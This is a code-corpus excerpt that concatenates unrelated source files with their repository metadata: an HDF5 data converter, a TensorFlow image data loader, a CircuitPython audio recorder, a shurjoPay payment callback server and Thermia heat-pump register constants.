## Read in the raw training data.
with open(toread_tr, newline="") as f_table:
print("Read {}.".format(toread_tr))
f_reader = csv.reader(f_table, delimiter=",",
skipinitialspace=True)
## Populate the placeholder numpy arrays.
idx = 0
for line in f_reader:
if len(line) == 0:
continue # do nothing for blank lines.
## Numpy arrays for individual instance.
x, y = parse_line(x=line[0:-1], y=line[-1])
if x is None:
continue # skip instances with missing values.
else:
X_raw_tr[idx,:] = x
y_raw_tr[idx,0] = y
## Update the index (also counts the clean data points).
idx += 1
## Check that number of *clean* instances is as expected.
print(
"Number of clean guys (tr): {}. Note n_tr = {}".format(idx,n_tr)
)
## Read in the raw test data.
with open(toread_te, newline="") as f_table:
print("Read {}.".format(toread_te))
f_reader = csv.reader(f_table, delimiter=",",
skipinitialspace=True)
## Populate the placeholder numpy arrays.
idx = 0
for i, line in enumerate(f_reader):
if i == 0:
continue # skip the first line, only for TEST data.
if len(line) == 0:
continue # do nothing for blank lines.
## Numpy arrays for individual instance.
x, y = parse_line(x=line[0:-1], y=line[-1][0:-1])
# Note: for test data, we strip training "." from labels.
if x is None:
continue # skip instances with missing values.
else:
X_raw_te[idx,:] = x
y_raw_te[idx,0] = y
## Update the index (also counts the clean data points).
idx += 1
## Check that number of *clean* instances is as expected.
print(
"Number of clean guys (te): {}. Note n_te = {}".format(idx,n_te)
)
## Concatenate.
X_raw = np.vstack((X_raw_tr, X_raw_te))
y_raw = np.vstack((y_raw_tr, y_raw_te))
## Create and populate the HDF5 file.
makedir_safe(newdir)
with tables.open_file(towrite, mode="w", title=title) as myh5:
myh5.create_array(where=myh5.root,
name="X",
obj=X_raw,
atom=atom_X,
title=title_X)
myh5.create_array(where=myh5.root,
name="y",
obj=y_raw,
atom=atom_y,
title=title_y)
print(myh5)
print("Wrote {}.".format(towrite))
## Exit all context managers before returning.
print("Done ({}).".format(data_name))
return None
if __name__ == "__main__":
raw_to_h5()
###############################################################################
| 2.046875
| 2
|
built-in/TensorFlow/Official/cv/image_classification/MobileNetV2_for_TensorFlow/00-access/dataloader/data_provider.py
|
Huawei-Ascend/modelzoo
| 0
|
12775561
|
# Copyright 2017 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functions to read, decode and pre-process input data for the Model.
"""
import collections
import sys
import tensorflow as tf
from tensorflow.python.data.experimental.ops import threadpool
# from tensorflow.contrib import slim
InputEndpoints = collections.namedtuple(
'InputEndpoints', ['images', 'images_orig', 'labels', 'labels_one_hot'])
ShuffleBatchConfig = collections.namedtuple('ShuffleBatchConfig', [
'num_batching_threads', 'queue_capacity', 'min_after_dequeue'
])
DEFAULT_SHUFFLE_CONFIG = ShuffleBatchConfig(
num_batching_threads=8, queue_capacity=3000, min_after_dequeue=1000)
def get_data_files(data_sources):
from tensorflow.python.platform import gfile
if isinstance(data_sources, (list, tuple)):
data_files = []
for source in data_sources:
data_files += get_data_files(source)
else:
if '*' in data_sources or '?' in data_sources or '[' in data_sources:
data_files = gfile.Glob(data_sources)
else:
data_files = [data_sources]
if not data_files:
raise ValueError('No data files found in %s' % (data_sources,))
return data_files
def preprocess_image(image, location, label_one_hot, height=224, width=224):
"""Prepare one image for evaluation.
If height and width are specified it would output an image with that size by
applying resize_bilinear.
If central_fraction is specified it would cropt the central fraction of the
input image.
Args:
image: 3-D Tensor of image. If dtype is tf.float32 then the range should be
[0, 1], otherwise it would converted to tf.float32 assuming that the range
is [0, MAX], where MAX is largest positive representable number for
int(8/16/32) data type (see `tf.image.convert_image_dtype` for details)
height: integer
width: integer
central_fraction: Optional Float, fraction of the image to crop.
scope: Optional scope for name_scope.
Returns:
3-D float Tensor of prepared image.
"""
# if image.dtype != tf.float32:
image = tf.image.convert_image_dtype(image, dtype=tf.float32)
# Crop the central region of the image with an area containing 87.5% of
# the original image.
# if central_fraction:
# image = tf.image.central_crop(image, central_fraction=central_fraction)
# if height and width:
# Resize the image to the specified height and width.
image = tf.expand_dims(image, 0)
image = tf.image.resize_bilinear(image, [height, width], align_corners=False)
image = tf.squeeze(image, [0])
# image = tf.cast(image, tf.float32)
# image = tf.multiply(image, 1/255.)
image = tf.subtract(image, 0.5)
image = tf.multiply(image, 2.0)
return image, location, label_one_hot
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def parse_example_proto(example_serialized, num_classes, labels_offset, image_preprocessing_fn):
feature_map = {
'image/encoded': tf.FixedLenFeature([], tf.string, ''),
'image/class/label': tf.FixedLenFeature([1], tf.int64, -1),
'image/class/text': tf.FixedLenFeature([], tf.string, ''),
'image/object/bbox/xmin': tf.VarLenFeature(dtype=tf.float32),
'image/object/bbox/ymin': tf.VarLenFeature(dtype=tf.float32),
'image/object/bbox/xmax': tf.VarLenFeature(dtype=tf.float32),
'image/object/bbox/ymax': tf.VarLenFeature(dtype=tf.float32)
}
with tf.compat.v1.name_scope('deserialize_image_record'):
obj = tf.io.parse_single_example(serialized=example_serialized, features=feature_map)
image = tf.image.decode_jpeg(obj['image/encoded'], channels=3, fancy_upscaling=False,
dct_method='INTEGER_FAST')
if image_preprocessing_fn:
image = image_preprocessing_fn(image, 224, 224)
else:
image = tf.image.resize(image, [224, 224])
label = tf.cast(obj['image/class/label'], tf.int32)
label = tf.squeeze(label)
label -= labels_offset
label = tf.one_hot(label, num_classes - labels_offset)
return image, label
def parse_example_decode(example_serialized):
feature_map = {
'image/encoded': tf.FixedLenFeature([], tf.string, ''),
'image/class/label': tf.FixedLenFeature([1], tf.int64, -1),
'image/class/text': tf.FixedLenFeature([], tf.string, ''),
'image/object/bbox/xmin': tf.VarLenFeature(dtype=tf.float32),
'image/object/bbox/ymin': tf.VarLenFeature(dtype=tf.float32),
'image/object/bbox/xmax': tf.VarLenFeature(dtype=tf.float32),
'image/object/bbox/ymax': tf.VarLenFeature(dtype=tf.float32)
}
with tf.compat.v1.name_scope('deserialize_image_record'):
obj = tf.io.parse_single_example(serialized=example_serialized, features=feature_map)
image = tf.image.decode_jpeg(obj['image/encoded'], channels=3, fancy_upscaling=False,
dct_method='INTEGER_FAST')
return image, obj['image/class/label']
def parse_example(image, label, num_classes, labels_offset, image_preprocessing_fn):
with tf.compat.v1.name_scope('deserialize_image_record'):
if image_preprocessing_fn:
image = image_preprocessing_fn(image, 224, 224)
else:
image = tf.image.resize(image, [224, 224])
label = tf.cast(label, tf.int32)
label = tf.squeeze(label)
label -= labels_offset
label = tf.one_hot(label, num_classes - labels_offset)
return image, label
def parse_example1(example_serialized, image_preprocessing_fn1):
feature_map = {
'image/encoded': tf.FixedLenFeature([], tf.string, ''),
'image/class/label': tf.FixedLenFeature([1], tf.int64, -1),
'image/class/text': tf.FixedLenFeature([], tf.string, ''),
'image/object/bbox/xmin': tf.VarLenFeature(dtype=tf.float32),
'image/object/bbox/ymin': tf.VarLenFeature(dtype=tf.float32),
'image/object/bbox/xmax': tf.VarLenFeature(dtype=tf.float32),
'image/object/bbox/ymax': tf.VarLenFeature(dtype=tf.float32)
}
with tf.compat.v1.name_scope('deserialize_image_record'):
obj = tf.io.parse_single_example(serialized=example_serialized, features=feature_map)
image = tf.image.decode_jpeg(obj['image/encoded'], channels=3, fancy_upscaling=False,
dct_method='INTEGER_FAST')
image = image_preprocessing_fn1(image, 224, 224)
return image, obj['image/class/label']
def parse_example2(image, label, num_classes, labels_offset, image_preprocessing_fn2):
with tf.compat.v1.name_scope('deserialize_image_record'):
image = image_preprocessing_fn2(image, 224, 224)
label = tf.cast(label, tf.int32)
label = tf.squeeze(label)
label -= labels_offset
label = tf.one_hot(label, num_classes - labels_offset)
return image, label
def get_data(dataset, batch_size, num_classes, labels_offset, is_training,
preprocessing_name=None, use_grayscale=None, add_image_summaries=False):
return get_data_united(dataset, batch_size, num_classes, labels_offset, is_training,
preprocessing_name, use_grayscale, add_image_summaries)
def create_ds(data_sources, is_training):
data_files = get_data_files(data_sources)
ds = tf.data.Dataset.from_tensor_slices(data_files)
if is_training:
ds = ds.shuffle(1000)
# add for eval
else:
ds = ds.take(50000)
##### change #####
num_readers = 10
ds = ds.interleave(
tf.data.TFRecordDataset, cycle_length=num_readers, block_length=1, num_parallel_calls=tf.data.experimental.AUTOTUNE)
counter = tf.data.Dataset.range(sys.maxsize)
ds = tf.data.Dataset.zip((ds, counter))
##### change #####
if is_training:
ds = ds.repeat()
return ds
def get_data_united(dataset, batch_size, num_classes, labels_offset, is_training,
preprocessing_name=None, use_grayscale=None, add_image_summaries=False):
from preprocessing import preprocessing_factory
image_preprocessing_fn = preprocessing_factory.get_preprocessing(
name='inception_v2',
is_training=is_training,
use_grayscale=use_grayscale,
add_image_summaries=add_image_summaries
)
ds = create_ds(dataset.data_sources, is_training)
ds = ds.map(lambda example, counter: parse_example_proto(example, num_classes, labels_offset, image_preprocessing_fn), num_parallel_calls=24)
ds = ds.batch(batch_size, drop_remainder=True)
ds = ds.prefetch(buffer_size=tf.contrib.data.AUTOTUNE)
iterator = ds.make_initializable_iterator()
ds = threadpool.override_threadpool(ds,threadpool.PrivateThreadPool(128, display_name='input_pipeline_thread_pool'))
return iterator, ds
| 2.25
| 2
|
record.py
|
Petroochio/audio-story-book
| 0
|
12775562
|
import board
import audioio
import audiobusio
import digitalio
import time
import array
import math
buf = bytearray(16000)
print(3)
time.sleep(1)
print(2)
time.sleep(1)
print(1)
time.sleep(1)
#print("recording", time.monotonic())
print("recording")
#trigger = digitalio.DigitalInOut(board.A1)
#trigger.switch_to_output(value = True)
with audiobusio.PDMIn(board.MICROPHONE_CLOCK, board.MICROPHONE_DATA) as mic:
mic.record(buf, len(buf))
#trigger.value = False
#print("done recording", time.monotonic())
print("done recording")
speaker_enable = digitalio.DigitalInOut(board.SPEAKER_ENABLE)
speaker_enable.switch_to_output(value=True)
time.sleep(1)
#trigger.value = True
#print("playback", time.monotonic())
print("playback")
with audioio.AudioOut(board.SPEAKER, buf) as speaker:
speaker.frequency = 8000
speaker.play()
while speaker.playing:
pass
#trigger.value = False
| 3.03125
| 3
|
src/shurjopay_v2/callbackHandler.py
|
shurjoPay-Plugins/python
| 0
|
12775563
|
<reponame>shurjoPay-Plugins/python
from collections import namedtuple
from contextlib import closing
from io import BytesIO
from json import dumps as json_encode
import os
import sys
import requests
import json
import datetime
import logging
import os
# Gets or creates a logger
logger = logging.getLogger(__name__)
# set log level
logger.setLevel(logging.DEBUG)
# define file handler and set formatter
log_fileName = 'LOGS/{:%Y-%m-%d}.log'.format(datetime.datetime.now())
os.makedirs(os.path.dirname(log_fileName), exist_ok=True)
file_handler = logging.FileHandler(log_fileName, mode="a", encoding=None,)
formatter = logging.Formatter('%(asctime)s : %(levelname)s : %(name)s : %(funcName)s %(message)s')
file_handler.setFormatter(formatter)
# add file handler to logger
logger.addHandler(file_handler)
if sys.version_info >= (3, 0):
from http.server import BaseHTTPRequestHandler, HTTPServer
from socketserver import ThreadingMixIn
from urllib.parse import parse_qs
else:
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
from SocketServer import ThreadingMixIn
from urlparse import parse_qs
ResponseStatus = namedtuple("HTTPStatus",
["code", "message"])
ResponseData = namedtuple("ResponseData",
["status", "content_type", "data_stream"])
# Mapping the output format used in the client to the content type for the
# response
AUDIO_FORMATS = {"ogg_vorbis": "audio/ogg",
"mp3": "audio/mpeg",
"pcm": "audio/wave; codecs=1"}
CHUNK_SIZE = 1024
HTTP_STATUS = {"OK": ResponseStatus(code=200, message="OK"),
"BAD_REQUEST": ResponseStatus(code=400, message="Bad request"),
"NOT_FOUND": ResponseStatus(code=404, message="Not found"),
"INTERNAL_SERVER_ERROR": ResponseStatus(code=500, message="Internal server error")}
PROTOCOL = "http"
RETURN_URL = "/return"
CANCEL_URL = "/cancel"
class HTTPStatusError(Exception):
"""Exception wrapping a value from http.server.HTTPStatus"""
def __init__(self, status, description=None):
"""
Constructs an error instance from a tuple of
(code, message, description), see http.server.HTTPStatus
"""
super(HTTPStatusError, self).__init__()
self.code = status.code
self.message = status.message
self.explain = description
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
"""An HTTP Server that handle each request in a new thread"""
daemon_threads = True
class ChunkedHTTPRequestHandler(BaseHTTPRequestHandler):
""""HTTP 1.1 Chunked encoding request handler"""
# Use HTTP 1.1 as 1.0 doesn't support chunked encoding
protocol_version = "HTTP/1.1"
verification_token = ''
def query_get(self, queryData, key, default=""):
"""Helper for getting values from a pre-parsed query string"""
return queryData.get(key, [default])[0]
def do_HEAD(self):
self.send_headers()
def do_GET(self):
"""Handles GET requests"""
# Extract values from the query string
path, _, query_string = self.path.partition('?')
query = parse_qs(query_string)
response = None
print(u"[START]: Received GET for %s with query: %s" % (path, query))
try:
# Handle the possible request paths
if path == RETURN_URL:
response = self.route_return(path, query)
elif path == CANCEL_URL:
response = self.route_cancel(path, query)
else:
response = self.route_not_found(path, query)
self.send_headers(response.status, response.content_type)
# self.stream_data(response.data_stream)
logger.info(response)
self._json(response.data_stream)
except HTTPStatusError as err:
# Respond with an error and log debug
# information
if sys.version_info >= (3, 0):
self.send_error(err.code, err.message, err.explain)
else:
self.send_error(err.code, err.message)
self.log_error(u"%s %s %s - [%d] %s", self.client_address[0],
self.command, self.path, err.code, err.explain)
print("[END]")
def route_not_found(self, path, query):
"""Handles routing for unexpected paths"""
raise HTTPStatusError(HTTP_STATUS["NOT_FOUND"], "Page not found")
def route_return(self, path, query):
"""Handles routing for the application's entry point'"""
try:
_POST_DEFAULT_ADDRESS = "https://sandbox.shurjopayment.com"
_VERIFICATION_END_POINT = "/api/verification"
# print('here!', query['order_id'][0])
_headers = {'content-type': 'application/json', 'Authorization': f'Bearer {self.verification_token}'}
_payloads = {
"order_id": query['order_id'][0],
}
response = requests.post(_POST_DEFAULT_ADDRESS + _VERIFICATION_END_POINT, headers=_headers,
data=json.dumps(_payloads))
response_json = response.json()
return ResponseData(status=HTTP_STATUS["OK"], content_type="application/json",
# Open a binary stream for reading the index
# HTML file
data_stream=response_json)
except IOError as err:
# Couldn't open the stream
raise HTTPStatusError(HTTP_STATUS["INTERNAL_SERVER_ERROR"],
str(err))
def route_cancel(self, path, query):
"""Handles routing for the application's entry point'"""
try:
return ResponseData(status=HTTP_STATUS["OK"], content_type="application/json",
# Open a binary stream for reading the index
# HTML file
data_stream=open(os.path.join(sys.path[0],
path[1:]), "rb"))
except IOError as err:
# Couldn't open the stream
raise HTTPStatusError(HTTP_STATUS["INTERNAL_SERVER_ERROR"],
str(err))
def send_headers(self, status, content_type):
"""Send out the group of headers for a successful request"""
# Send HTTP headers
self.send_response(status.code, status.message)
self.send_header('Content-type', content_type)
# self.send_header('Transfer-Encoding', 'chunked')
# self.send_header('Connection', 'close')
self.send_header('Access-Control-Allow-Origin', '*')
self.end_headers()
def _html(self, message):
"""This just generates an HTML document that includes `message`
in the body. Override, or re-write this do do more interesting stuff.
"""
content = f"<html><body><h1>{message}</h1></body></html>"
return content.encode("utf8") # NOTE: must return a bytes object!
def _json(self, response):
str = json_encode(response)
self.wfile.write(str.encode("utf8"))
def stream_data(self, stream):
"""Consumes a stream in chunks to produce the response's output'"""
print("Streaming started...")
if stream:
# Note: Closing the stream is important as the service throttles on
# the number of parallel connections. Here we are using
# contextlib.closing to ensure the close method of the stream object
# will be called automatically at the end of the with statement's
# scope.
# with closing(stream) as managed_stream:
# Push out the stream's content in chunks
while True:
# data = managed_stream.read(CHUNK_SIZE)
data = stream
self.wfile.write(self._html(data))
# If there's no more data to read, stop streaming
if not data:
break
# Ensure any buffered output has been transmitted and close the
# stream
self.wfile.flush()
print("Streaming completed.")
else:
# The stream passed in is empty
self.wfile.write(b"0\r\n\r\n")
print("Nothing to stream.")
def wait_for_request(host, port, token):
# Create and configure the HTTP server instance
handler = ChunkedHTTPRequestHandler
handler.verification_token = token
server = ThreadedHTTPServer((host, port),
handler)
print("Starting server, use <Ctrl-C> to stop...")
print(u"Open {0}://{1}:{2} in a web browser.".format(PROTOCOL,
host,
port,
))
try:
# Listen for requests indefinitely
server.handle_request()
except KeyboardInterrupt:
# A request to terminate has been received, stop the server
print("\nShutting down...")
server.socket.close()
| 2.140625
| 2
|
pythermiagenesis/const.py
|
CJNE/pythermiagenesis
| 5
|
12775564
|
<filename>pythermiagenesis/const.py
"""Constants for ThermiaGenesis integration."""
KEY_ATTRIBUTES = 'attributes'
KEY_ADDRESS = 'address'
KEY_RANGES = 'ranges'
KEY_SCALE = 'scale'
KEY_REG_TYPE = 'register_type'
KEY_BITS = 'bits'
KEY_DATATYPE = 'datatype'
TYPE_BIT = 'bit'
TYPE_INT = 'int'
TYPE_UINT = 'uint'
TYPE_LONG = 'long'
TYPE_STATUS = 'status'
REG_COIL = 'coil'
REG_DISCRETE_INPUT = 'dinput'
REG_INPUT = 'input'
REG_HOLDING = 'holding'
REG_TYPES = [REG_COIL, REG_DISCRETE_INPUT, REG_INPUT, REG_HOLDING]
DOMAIN = "thermiagenesis"
MODEL_MEGA = 'mega'
MODEL_INVERTER = 'inverter'
REGISTER_RANGES = {
MODEL_MEGA: {
REG_COIL: [[3, 28],[28, 59]],
REG_DISCRETE_INPUT: [[0,3], [9, 83], [199, 247]],
REG_INPUT: [[0, 100], [100, 174]],
REG_HOLDING: [[0, 115], [116,116], [199, 217], [239, 257], [299, 321]],
},
MODEL_INVERTER: {
#REG_COIL: [[3, 22],[23, 41]],
#REG_DISCRETE_INPUT: [[0,3], [9, 45], [46, 83], [199, 247]],
#REG_INPUT: [[0, 50], [51, 100], [100, 174]],
#REG_HOLDING: [[0, 29], [30, 58], [59, 87], [88, 116], [199, 217], [239, 257], [299, 305]],
REG_COIL: [[3, 41]],
REG_DISCRETE_INPUT: [[0,3], [9, 45], [46, 83], [199, 247]],
REG_INPUT: [[0, 174]],
REG_HOLDING: [[0, 115],[116,116],[199, 217], [239, 257], [299, 305]],
}
}
ATTR_COIL_RESET_ALL_ALARMS = "coil_reset_all_alarms"
ATTR_COIL_ENABLE_INTERNAL_ADDITIONAL_HEATER = "coil_enable_internal_additional_heater"
ATTR_COIL_ENABLE_EXTERNAL_ADDITIONAL_HEATER = "coil_enable_external_additional_heater"
ATTR_COIL_ENABLE_HGW = "coil_enable_hgw"
ATTR_COIL_ENABLE_FLOW_SWITCH_PRESSURE_SWITCH = "coil_enable_flow_switch_pressure_switch"
ATTR_COIL_ENABLE_TAP_WATER = "coil_enable_tap_water"
ATTR_COIL_ENABLE_HEAT = "coil_enable_heat"
ATTR_COIL_ENABLE_ACTIVE_COOLING = "coil_enable_active_cooling"
ATTR_COIL_ENABLE_MIX_VALVE_1 = "coil_enable_mix_valve_1"
ATTR_COIL_ENABLE_TWC = "coil_enable_twc"
ATTR_COIL_ENABLE_WCS = "coil_enable_wcs"
ATTR_COIL_ENABLE_HOT_GAS_PUMP = "coil_enable_hot_gas_pump"
ATTR_COIL_ENABLE_MIX_VALVE_2 = "coil_enable_mix_valve_2"
ATTR_COIL_ENABLE_MIX_VALVE_3 = "coil_enable_mix_valve_3"
ATTR_COIL_ENABLE_MIX_VALVE_4 = "coil_enable_mix_valve_4"
ATTR_COIL_ENABLE_MIX_VALVE_5 = "coil_enable_mix_valve_5"
ATTR_COIL_ENABLE_BRINE_OUT_MONITORING = "coil_enable_brine_out_monitoring"
ATTR_COIL_ENABLE_BRINE_PUMP_CONTINUOUS_OPERATION = "coil_enable_brine_pump_continuous_operation"
ATTR_COIL_ENABLE_SYSTEM_CIRCULATION_PUMP = "coil_enable_system_circulation_pump"
ATTR_COIL_ENABLE_DEW_POINT_CALCULATION = "coil_enable_dew_point_calculation"
ATTR_COIL_ENABLE_ANTI_LEGIONELLA = "coil_enable_anti_legionella"
ATTR_COIL_ENABLE_ADDITIONAL_HEATER_ONLY = "coil_enable_additional_heater_only"
ATTR_COIL_ENABLE_CURRENT_LIMITATION = "coil_enable_current_limitation"
ATTR_COIL_ENABLE_POOL = "coil_enable_pool"
ATTR_COIL_ENABLE_SURPLUS_HEAT_CHILLER = "coil_enable_surplus_heat_chiller"
ATTR_COIL_ENABLE_SURPLUS_HEAT_BOREHOLE = "coil_enable_surplus_heat_borehole"
ATTR_COIL_ENABLE_EXTERNAL_ADDITIONAL_HEATER_FOR_POOL = "coil_enable_external_additional_heater_for_pool"
ATTR_COIL_ENABLE_INTERNAL_ADDITIONAL_HEATER_FOR_POOL = "coil_enable_internal_additional_heater_for_pool"
ATTR_COIL_ENABLE_PASSIVE_COOLING = "coil_enable_passive_cooling"
ATTR_COIL_ENABLE_VARIABLE_SPEED_MODE_FOR_CONDENSER_PUMP = "coil_enable_variable_speed_mode_for_condenser_pump"
ATTR_COIL_ENABLE_VARIABLE_SPEED_MODE_FOR_BRINE_PUMP = "coil_enable_variable_speed_mode_for_brine_pump"
ATTR_COIL_ENABLE_COOLING_MODE_FOR_MIXING_VALVE_1 = "coil_enable_cooling_mode_for_mixing_valve_1"
ATTR_COIL_ENABLE_OUTDOOR_TEMP_DEPENDENT_FOR_COOLING_WITH_MIXING_VALVE_1 = "coil_enable_outdoor_temp_dependent_for_cooling_with_mixing_valve_1"
ATTR_COIL_ENABLE_INTERNAL_BRINE_PUMP_TO_START_WHEN_COOLING_IS_ACTIVE_FOR_MIXING_VALVE_1 = "coil_enable_internal_brine_pump_to_start_when_cooling_is_active_for_mixing_valve_1"
ATTR_COIL_ENABLE_OUTDOOR_TEMP_DEPENDENT_FOR_EXTERNAL_HEATER = "coil_enable_outdoor_temp_dependent_for_external_heater"
ATTR_COIL_ENABLE_BRINE_IN_MONITORING = "coil_enable_brine_in_monitoring"
ATTR_COIL_ENABLE_FIXED_SYSTEM_SUPPLY_SET_POINT = "coil_enable_fixed_system_supply_set_point"
ATTR_COIL_ENABLE_EVAPORATOR_FREEZE_PROTECTION = "coil_enable_evaporator_freeze_protection"
ATTR_COIL_ENABLE_OUTDOOR_TEMP_DEPENDENT_FOR_COOLING_WITH_MIXING_VALVE_2 = "coil_enable_outdoor_temp_dependent_for_cooling_with_mixing_valve_2"
ATTR_COIL_ENABLE_DEW_POINT_CALCULATION_ON_MIXING_VALVE_2 = "coil_enable_dew_point_calculation_on_mixing_valve_2"
ATTR_COIL_ENABLE_OUTDOOR_TEMP_DEPENDENT_FOR_HEATING_WITH_MIXING_VALVE_2 = "coil_enable_outdoor_temp_dependent_for_heating_with_mixing_valve_2"
ATTR_COIL_ENABLE_OUTDOOR_TEMP_DEPENDENT_FOR_COOLING_WITH_MIXING_VALVE_3 = "coil_enable_outdoor_temp_dependent_for_cooling_with_mixing_valve_3"
ATTR_COIL_ENABLE_DEW_POINT_CALCULATION_ON_MIXING_VALVE_3 = "coil_enable_dew_point_calculation_on_mixing_valve_3"
ATTR_COIL_ENABLE_OUTDOOR_TEMP_DEPENDENT_FOR_HEATING_WITH_MIXING_VALVE_3 = "coil_enable_outdoor_temp_dependent_for_heating_with_mixing_valve_3"
ATTR_COIL_ENABLE_OUTDOOR_TEMP_DEPENDENT_FOR_COOLING_WITH_MIXING_VALVE_4 = "coil_enable_outdoor_temp_dependent_for_cooling_with_mixing_valve_4"
ATTR_COIL_ENABLE_DEW_POINT_CALCULATION_ON_MIXING_VALVE_4 = "coil_enable_dew_point_calculation_on_mixing_valve_4"
ATTR_COIL_ENABLE_OUTDOOR_TEMP_DEPENDENT_FOR_HEATING_WITH_MIXING_VALVE_4 = "coil_enable_outdoor_temp_dependent_for_heating_with_mixing_valve_4"
ATTR_COIL_ENABLE_OUTDOOR_TEMP_DEPENDENT_FOR_COOLING_WITH_MIXING_VALVE_5 = "coil_enable_outdoor_temp_dependent_for_cooling_with_mixing_valve_5"
ATTR_COIL_ENABLE_DEW_POINT_CALCULATION_ON_MIXING_VALVE_5 = "coil_enable_dew_point_calculation_on_mixing_valve_5"
ATTR_COIL_ENABLE_OUTDOOR_TEMP_DEPENDENT_FOR_HEATING_WITH_MIXING_VALVE_5 = "coil_enable_outdoor_temp_dependent_for_heating_with_mixing_valve_5"
ATTR_COIL_ENABLE_INTERNAL_BRINE_PUMP_TO_START_WHEN_COOLING_IS_ACTIVE_FOR_MIXING_VALVE_2 = "coil_enable_internal_brine_pump_to_start_when_cooling_is_active_for_mixing_valve_2"
ATTR_COIL_ENABLE_INTERNAL_BRINE_PUMP_TO_START_WHEN_COOLING_IS_ACTIVE_FOR_MIXING_VALVE_3 = "coil_enable_internal_brine_pump_to_start_when_cooling_is_active_for_mixing_valve_3"
ATTR_COIL_ENABLE_INTERNAL_BRINE_PUMP_TO_START_WHEN_COOLING_IS_ACTIVE_FOR_MIXING_VALVE_4 = "coil_enable_internal_brine_pump_to_start_when_cooling_is_active_for_mixing_valve_4"
ATTR_COIL_ENABLE_INTERNAL_BRINE_PUMP_TO_START_WHEN_COOLING_IS_ACTIVE_FOR_MIXING_VALVE_5 = "coil_enable_internal_brine_pump_to_start_when_cooling_is_active_for_mixing_valve_5"
ATTR_DINPUT_ALARM_ACTIVE_CLASS_A = "dinput_alarm_active_class_a"
ATTR_DINPUT_ALARM_ACTIVE_CLASS_B = "dinput_alarm_active_class_b"
ATTR_DINPUT_ALARM_ACTIVE_CLASS_C = "dinput_alarm_active_class_c"
ATTR_DINPUT_ALARM_ACTIVE_CLASS_D = "dinput_alarm_active_class_d"
ATTR_DINPUT_ALARM_ACTIVE_CLASS_E = "dinput_alarm_active_class_e"
ATTR_DINPUT_HIGH_PRESSURE_SWITCH_ALARM = "dinput_high_pressure_switch_alarm"
ATTR_DINPUT_LOW_PRESSURE_LEVEL_ALARM = "dinput_low_pressure_level_alarm"
ATTR_DINPUT_HIGH_DISCHARGE_PIPE_TEMPERATURE_ALARM = "dinput_high_discharge_pipe_temperature_alarm"
ATTR_DINPUT_OPERATING_PRESSURE_LIMIT_INDICATION = "dinput_operating_pressure_limit_indication"
ATTR_DINPUT_DISCHARGE_PIPE_SENSOR_ALARM = "dinput_discharge_pipe_sensor_alarm"
ATTR_DINPUT_LIQUID_LINE_SENSOR_ALARM = "dinput_liquid_line_sensor_alarm"
ATTR_DINPUT_SUCTION_GAS_SENSOR_ALARM = "dinput_suction_gas_sensor_alarm"
ATTR_DINPUT_FLOW_PRESSURE_SWITCH_ALARM = "dinput_flow_pressure_switch_alarm"
ATTR_DINPUT_POWER_INPUT_PHASE_DETECTION_ALARM = "dinput_power_input_phase_detection_alarm"
ATTR_DINPUT_INVERTER_UNIT_ALARM = "dinput_inverter_unit_alarm"
ATTR_DINPUT_SYSTEM_SUPPLY_LOW_TEMPERATURE_ALARM = "dinput_system_supply_low_temperature_alarm"
ATTR_DINPUT_COMPRESSOR_LOW_SPEED_ALARM = "dinput_compressor_low_speed_alarm"
ATTR_DINPUT_LOW_SUPER_HEAT_ALARM = "dinput_low_super_heat_alarm"
ATTR_DINPUT_PRESSURE_RATIO_OUT_OF_RANGE_ALARM = "dinput_pressure_ratio_out_of_range_alarm"
ATTR_DINPUT_COMPRESSOR_PRESSURE_OUTSIDE_ENVELOPE_ALARM = "dinput_compressor_pressure_outside_envelope_alarm"
ATTR_DINPUT_BRINE_TEMPERATURE_OUT_OF_RANGE_ALARM = "dinput_brine_temperature_out_of_range_alarm"
ATTR_DINPUT_BRINE_IN_SENSOR_ALARM = "dinput_brine_in_sensor_alarm"
ATTR_DINPUT_BRINE_OUT_SENSOR_ALARM = "dinput_brine_out_sensor_alarm"
ATTR_DINPUT_CONDENSER_IN_SENSOR_ALARM = "dinput_condenser_in_sensor_alarm"
ATTR_DINPUT_CONDENSER_OUT_SENSOR_ALARM = "dinput_condenser_out_sensor_alarm"
ATTR_DINPUT_OUTDOOR_SENSOR_ALARM = "dinput_outdoor_sensor_alarm"
ATTR_DINPUT_SYSTEM_SUPPLY_LINE_SENSOR_ALARM = "dinput_system_supply_line_sensor_alarm"
ATTR_DINPUT_MIX_VALVE_1_SUPPLY_LINE_SENSOR_ALARM = "dinput_mix_valve_1_supply_line_sensor_alarm"
ATTR_DINPUT_MIX_VALVE_2_SUPPLY_LINE_SENSOR_ALARM = "dinput_mix_valve_2_supply_line_sensor_alarm"
ATTR_DINPUT_MIX_VALVE_3_SUPPLY_LINE_SENSOR_ALARM = "dinput_mix_valve_3_supply_line_sensor_alarm"
ATTR_DINPUT_MIX_VALVE_4_SUPPLY_LINE_SENSOR_ALARM = "dinput_mix_valve_4_supply_line_sensor_alarm"
ATTR_DINPUT_MIX_VALVE_5_SUPPLY_LINE_SENSOR_ALARM = "dinput_mix_valve_5_supply_line_sensor_alarm"
ATTR_DINPUT_WCS_RETURN_LINE_SENSOR_ALARM = "dinput_wcs_return_line_sensor_alarm"
ATTR_DINPUT_TWC_SUPPLY_LINE_SENSOR_ALARM = "dinput_twc_supply_line_sensor_alarm"
ATTR_DINPUT_COOLING_TANK_SENSOR_ALARM = "dinput_cooling_tank_sensor_alarm"
ATTR_DINPUT_COOLING_SUPPLY_LINE_SENSOR_ALARM = "dinput_cooling_supply_line_sensor_alarm"
ATTR_DINPUT_COOLING_CIRCUIT_RETURN_LINE_SENSOR_ALARM = "dinput_cooling_circuit_return_line_sensor_alarm"
ATTR_DINPUT_BRINE_DELTA_OUT_OF_RANGE_ALARM = "dinput_brine_delta_out_of_range_alarm"
ATTR_DINPUT_TAP_WATER_MID_SENSOR_ALARM = "dinput_tap_water_mid_sensor_alarm"
